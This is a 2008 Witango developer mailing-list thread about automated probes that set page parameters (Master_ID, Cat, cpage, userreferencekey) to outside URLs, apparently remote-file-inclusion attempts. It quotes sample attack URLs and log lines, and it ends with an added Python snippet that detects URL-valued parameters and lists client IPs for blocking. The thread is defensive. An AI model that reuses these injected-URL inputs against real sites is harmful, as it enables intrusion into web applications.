Steve,

There have been quite a few url attacks recently. They automated the attacks by setting up http://...... as a url parameter, and they came about every hour under different IP addresses too. If your url uses the userreferencekey and they set userreferencekey=http://..... you will see the expiration of the key in the log. In our case, we have automated a process to block these IPs.

MC

At 08:40 PM 3/18/2008, you wrote:
Hi,

Just thought I would resurrect this thread. A few developers mentioned they are seeing the same thing. I was looking at a Witango log and discovered the following.

18/03/2008 22:22:04 [EMAIL PROTECTED]://www.insanechicken.com//phpMyAdmin/libraries/ludeme/gakacag/ 0 [Expired] Variables for key [EMAIL PROTECTED]://www.insanechicken.com//phpMyAdmin/libraries/ludeme/gakacag/

How are these guys creating a (I assume) userreferencekey equal to their url? Is this a problem?

Just curious. Maybe worried!

Steve Fogelson


----------
From: Fogelson, Steve [mailto:[EMAIL PROTECTED]
Sent: Thursday, February 28, 2008 9:44 AM
To: [email protected]
Subject: Witango-Talk: Curiuos

Hi,

Here is a sample of urls that are being submitted to some of my sites. They are reported as errors as I'm using Scott's error reporting routine.

www.xxxxxx.com/Category/2lvl1lstbx.taf?Master_ID=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&cat=150

www.xxx.com/main.taf?Cat=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fcontent%2Fugi%2Fvipo%2F&RD=1&_start=

www.xxxx.com/custom.taf?cpage=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F

I checked the ip address and they are coming from Amsterdam. Does this look like possible "cross-scripting" attempts or some other "hack" on their part?

Some time back I had to resort to white-listing ip addresses on my ftp servers as brute force account and password attacks were originating from Amsterdam.

Thanks

Steve Fogelson


________________________________________________________________________
TO UNSUBSCRIBE: Go to http://www.witango.com/developer/maillist.taf
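
Added example, not part of the original thread and not Witango code: one way to pick out the requests described above, where a query parameter (Master_ID, Cat, cpage, userreferencekey) carries an absolute URL as its value, and to group them by client IP as candidates for blocking. The log records, IP addresses, the remote.example host and the URL_PARAMS_ALLOWED set are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Schemes that should not appear at the start of an ID/category/key value.
SCHEMES = ("http://", "https://", "ftp://")

# Hypothetical allowlist: parameters that legitimately carry a URL
# (e.g. a return link). Empty here; fill in per application.
URL_PARAMS_ALLOWED = set()

# Constructed sample records (client IP, request target). The .taf paths and
# parameter names follow the thread; hosts and IPs are placeholders.
SAMPLE = [
    ("192.0.2.10", "/Category/2lvl1lstbx.taf?Master_ID=http%3A%2F%2Fremote.example%2Fa%2Fb%2F&cat=150"),
    ("198.51.100.7", "/main.taf?Cat=HTTP%3A%2F%2Fremote.example%2Fc%2F&RD=1&_start="),
    ("192.0.2.10", "/custom.taf?userreferencekey=http://remote.example/d/"),
    ("203.0.113.5", "/main.taf?Cat=150&RD=1&_start="),
]

def url_valued_params(target):
    """Return [(name, decoded_value)] for parameters whose value is an absolute URL."""
    hits = []
    # parse_qsl percent-decodes once, so http%3A%2F%2F... and http://... both match.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in URL_PARAMS_ALLOWED:
            continue
        if value.strip().lower().startswith(SCHEMES):
            hits.append((name, value))
    return hits

def offenders(records, min_hits=1):
    """Map client IP -> flagged parameter names, for IPs with at least min_hits hits."""
    seen = defaultdict(list)
    for ip, target in records:
        for name, _value in url_valued_params(target):
            seen[ip].append(name)
    return {ip: names for ip, names in seen.items() if len(names) >= min_hits}

if __name__ == "__main__":
    for ip, names in sorted(offenders(SAMPLE).items()):
        print(ip, ",".join(names))
```

Since the requests arrive from a different IP address each time, rejecting the URL-valued parameter at the application is the more durable control; the per-IP list is a supplement to it.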


